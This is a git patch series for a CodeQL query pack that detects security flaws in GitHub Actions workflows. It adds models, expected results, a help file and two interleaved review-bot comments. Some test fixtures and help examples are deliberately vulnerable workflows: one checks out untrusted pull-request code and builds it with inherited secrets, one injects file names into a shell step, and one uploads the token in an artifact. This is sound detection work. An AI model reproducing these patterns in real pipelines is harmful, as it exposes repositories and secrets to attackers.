@@ -0,0 +1,37 @@ +name: Build Android app (stripe) +on: + push: + branches: + - main + - fix-ci + workflow_dispatch: + pull_request_target: + branches: + - main + paths: + - 'custom-payment-flow/client/android-kotlin/**' + - '!**.css' + - '!**.md' + +jobs: + android_build: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.after || github.event.pull_request.head.sha }} + + - name: Build + working-directory: custom-payment-flow/client/android-kotlin + run: | + ./gradlew build + + dependabot-auto-merge: + if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} + needs: android_build + permissions: + contents: write + pull-requests: write + uses: ./.github/workflows/wf_dependabot.yaml + secrets: inherit diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 711a529b179..7313ffd9ae3 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -174,6 +174,7 @@ edges | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -207,6 +208,13 @@ edges | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
| +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | 
@@ -214,6 +222,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 3619941aa12..b9cf0e547ca 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -15,6 +15,9 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 321e5504bc34945054ac2f13d76ae44e4f02e0aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:59:04 +0200 Subject: [PATCH 0502/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0392a200bb4..45d91dcb7cc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.41 +version: 0.1.42 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 5b81393abdb..a41aba95438 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.41
+version: 0.1.42
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From b199fdc3e255b92dfe57434d6a6316323a6f0ef9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 10:25:10 +0200 Subject: [PATCH 0503/1267] Add new models for file listing actions --- ...riHaximus_github-action-files-in-commit.model.yml | 9 +++++++++ .../ext/manual/ab185508_file-type-finder.model.yml | 10 ++++++++++ .../manual/ankitjain28may_list-files-in-pr.model.yml | 9 +++++++++ .../avraamMavridis_files-changed-action.model.yml | 10 ++++++++++ .../manual/jsmith_changes-since-last-tag.model.yml | 12 ++++++++++++ .../karpikpl_list-changed-files-action.model.yml | 8 ++++++++ ql/lib/ext/manual/knu_changed-files.model.yml | 11 +++++++++++ .../ext/manual/martinhaintz_ga-file-list.model.yml | 8 ++++++++ .../manual/rishabh510_path-lister-action.model.yml | 9 +++++++++ .../manual/the-coding-turtle_ga-file-list.model.yml | 8 ++++++++ .../ext/manual/w3f_action-find-old-files.model.yml | 8 ++++++++ ql/lib/ext/manual/yumemi-inc_changed-files.model.yml | 9 +++++++++ 12 files changed, 111 insertions(+) create mode 100644 ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml create mode 100644 ql/lib/ext/manual/ab185508_file-type-finder.model.yml create mode 100644 ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml create mode 100644 ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml create mode 100644 ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml create mode 100644 ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml create mode 100644 ql/lib/ext/manual/knu_changed-files.model.yml create mode 100644 ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/rishabh510_path-lister-action.model.yml create mode 100644 ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/w3f_action-find-old-files.model.yml create mode 100644 ql/lib/ext/manual/yumemi-inc_changed-files.model.yml 
diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml new file mode 100644 index 00000000000..e2009c88851 --- /dev/null +++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/WyriHaximus/github-action-files-in-commit + - ["WyriHaximus/github-action-files-in-commit", "*", "output.files", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml new file mode 100644 index 00000000000..119b4b1d814 --- /dev/null +++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ab185508/file-type-finder + - ["ab185508/file-type-finder", "*", "output.paths", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.names", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.extaddpaths", "filename", "manual"] + diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml new file mode 100644 index 00000000000..e3c9297cf23 --- /dev/null +++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ankitjain28may/list-files-in-pr + - ["ankitjain28may/list-files-in-pr", "*", "output.pullRequestFiles", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml new file mode 100644 index 00000000000..c14bc95c013 --- /dev/null 
+++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/AvraamMavridis/files-changed-action + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES", "filename", "manual"] + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES_EXTENSIONS", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml new file mode 100644 index 00000000000..3a5cf8c8be2 --- /dev/null +++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/jsmith/changes-since-last-tag + - ["jsmith/changes-since-last-tag", "*", "output.files", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.added", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.modified", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.removed", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.renamed", "filename", "manual"] + diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml new file mode 100644 index 00000000000..0d4df5ef6b1 --- /dev/null +++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml @@ -0,0 +1,8 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/karpikpl/list-changed-files-action + - ["karpikpl/list-changed-files-action", "*", "output.changed_files", "filename", "manual"] diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml new file mode 100644 index 00000000000..5e7374dabad --- /dev/null 
+++ b/ql/lib/ext/manual/knu_changed-files.model.yml @@ -0,0 +1,11 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/knu/changed-files + - ["knu/changed-files", "*", "output.changed_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.changed_files_json", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files_json", "filename", "manual"] diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml new file mode 100644 index 00000000000..9d0ecf04c6b --- /dev/null +++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/martinhaintz/ga-file-list + - ["martinhaintz/ga-file-list", "*", "output.files", "filename", "manual"] + - ["martinhaintz/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml new file mode 100644 index 00000000000..281602cf0c7 --- /dev/null +++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/Rishabh510/Path-lister-action + - ["Rishabh510/Path-lister-action", "*", "output.paths", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml new file mode 100644 index 00000000000..7daafbc2fd8 --- /dev/null +++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml 
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/the-coding-turtle/ga-file-list
+ - ["the-coding-turtle/ga-file-list", "*", "output.files", "filename", "manual"]
+ - ["the-coding-turtle/ga-file-list", "*", "output.file_names", "filename", "manual"]
diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
new file mode 100644
index 00000000000..38d892966d4
--- /dev/null
+++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/w3f/action-find-old-files
+ - ["w3f/action-find-old-files", "*", "output.files", "filename", "manual"]
+
diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
new file mode 100644
index 00000000000..c65f7b1055f
--- /dev/null
+++ b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ # https://github.com/yumemi-inc/changed-files
+ - ["yumemi-inc/changed-files", "*", "output.files", "filename", "manual"]
+
+
From 15bb4d851d8210ce97b1d44bec6d7a8edd71b4aa Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 11 Sep 2024 10:25:31 +0200
Subject: [PATCH 0504/1267] Add new test for flow through matrix
---
.../CWE-094/.github/workflows/matrix_flow.yml | 29 +++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml
new file mode 100644
index 00000000000..1093ddd3c4c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml
@@ -0,0 +1,29 @@
+name: Matrix Flow
+
+on:
+ pull_request_target:
+
+jobs:
+ lookup:
+ runs-on: ubuntu-latest
+ outputs:
+ matrix: ${{ steps.filelist.outputs.file_names }}
+ steps:
+ - uses: actions/checkout@v2
+ - name: Get all zip files
+ id: filelist
+ uses: the-coding-turtle/ga-file-list@v0.1
+ with:
+ directory: "."
+ file_extension: "zip"
+
+ multi_tenant:
+ needs: lookup
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ tenant: ${{fromJson(needs.lookup.outputs.matrix)}}
+ steps:
+ - name: Show all files
+ run: |
+ echo "this is file: ${{ matrix.TENANT }}"
From 5fe81ddb08b18a29bce260d9a052c623e2049931 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 11 Sep 2024 18:07:25 +0200
Subject: [PATCH 0505/1267] Update tests
---
ql/test/library-tests/test.expected | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index 6bedcadcdba..9205675ac0f 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
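Review bot: The `matrix_flow.yml` fixture is added without an expectation: the diffstat lists only this file, and the following commit in the series updates only `ql/test/library-tests/test.expected`, so no CWE-094 `.expected` file records that the `file_names` output reaching `${{ matrix.TENANT }}` in the `run` step is reported. Either the query test now fails on an unexpected result or the query does not report this flow yet; the commit does not say which. A comment on the `run` step, e.g. `# expected: code injection alert, tainted via needs.lookup.outputs.matrix`, plus a note that the `tenant`/`TENANT` case difference is deliberate, would make the fixture self-explanatory.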
@@ -1327,10 +1327,18 @@ scopes | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | | ahmadnassri/action-changed-files | * | output.files | filename | manual | | ahmadnassri/action-changed-files | * | output.json | json | manual | | alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | | amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | | eficode/resolve-pr-refs | * | output.head_ref | branch | manual | 
@@ -1345,16 +1353,30 @@ sources | jitterbit/get-changed-files | * | output.modified | filename | manual | | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | | lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| 
the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | trilom/file-changes-action | * | output.files | filename | manual | @@ -1362,7 +1384,9 @@ sources | trilom/file-changes-action | * | output.files_modified | filename | manual | | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | summaries | ActionsTools/read-json-action | * | artifact | output.* | taint | manual | | BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | From 48a0fd500d630e840e2797dd4cea2420e8658365 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 18:09:05 +0200 Subject: [PATCH 0506/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 45d91dcb7cc..cf4acd613e3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.42 +version: 0.1.43 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a41aba95438..a5cff260536 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.42 +version: 0.1.43 groups: [actions, queries] suites: codeql-suites extractor: javascript From 69818c5bb5a22c0d6327d572be0eb8f1b266fd98 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 09:58:21 +0200 Subject: [PATCH 0507/1267] Remove bindingset from DataFlow's compatibleTypes --- ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 2d391841410..0d214c63c5d 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -166,8 +166,7 @@ class DataFlowType extends TDataFlowType { string ppReprType(DataFlowType t) { none() } -bindingset[t1, t2] -predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { any() } predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } From 3a390582991cee93903a38be9f064237ae8f6af3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 10:42:12 +0200 Subject: [PATCH 0508/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index cf4acd613e3..0e019d05e86 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.43 +version: 0.1.44 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a5cff260536..83c273431e1 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.43 +version: 0.1.44 groups: [actions, queries] suites: codeql-suites extractor: javascript From 69b9542a5f4c6ab446e71c1423f9a6caf8ba1b3c Mon Sep 17 00:00:00 2001 
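Review bot: With the body `any()` and no `bindingset`, `compatibleTypes` in DataFlowPrivate.qll holds for every pair of `DataFlowType` values, so the shared data-flow library gets no type-based pruning from it and the predicate is evaluated as the full cross product. That is harmless only if `DataFlowType` has very few values, which the hunk does not show. A comment above the predicate would record the intent, for example `// All nodes share one type, so every pair is compatible; type pruning is intentionally off.` if that is indeed the case.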
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 17 Sep 2024 17:06:50 +0200
Subject: [PATCH 0509/1267] Add help file for SecretsInArtifacts query
---
ql/src/Security/CWE-312/SecretsInArtifacts.md | 47 +++++++++++++++++++
1 file changed, 47 insertions(+)
create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.md
diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.md b/ql/src/Security/CWE-312/SecretsInArtifacts.md
new file mode 100644
index 00000000000..5b05c9a118f
--- /dev/null
+++ b/ql/src/Security/CWE-312/SecretsInArtifacts.md
@@ -0,0 +1,47 @@
+# Storage of sensitive information in GitHub Actions artifact
+
+## Description
+
+Sensitive information included in a GitHub Actions artifact can allow an attacker to access the sensitive information if the artifact is published.
+
+## Recommendation
+
+Only store information that is meant to be publicly available in a GitHub Actions artifact.
+
+## Example
+
+The following example uses `actions/checkout` to checkout code which stores the GITHUB_TOKEN in the \`.git/config\` file and then stores the contents of the \`.git\` repository into the artifact:
+
+```yaml
+name: secrets-in-artifacts
+on:
+ pull_request:
+jobs:
+ a-job: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: .
+```
+
+The issue has been fixed below, where the `actions/upload-artifact` uses a version (v4+) which does not include hidden files or directories into the artifact.
+
+```yaml
+name: secrets-in-artifacts
+on:
+ pull_request:
+jobs:
+ a-job: # NOT VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@v4
+ with:
+ name: file
+ path: .
+```
From 92f3b1614c16889ab32a6bc0fcfb7be2fced9c40 Mon Sep 17 00:00:00 2001
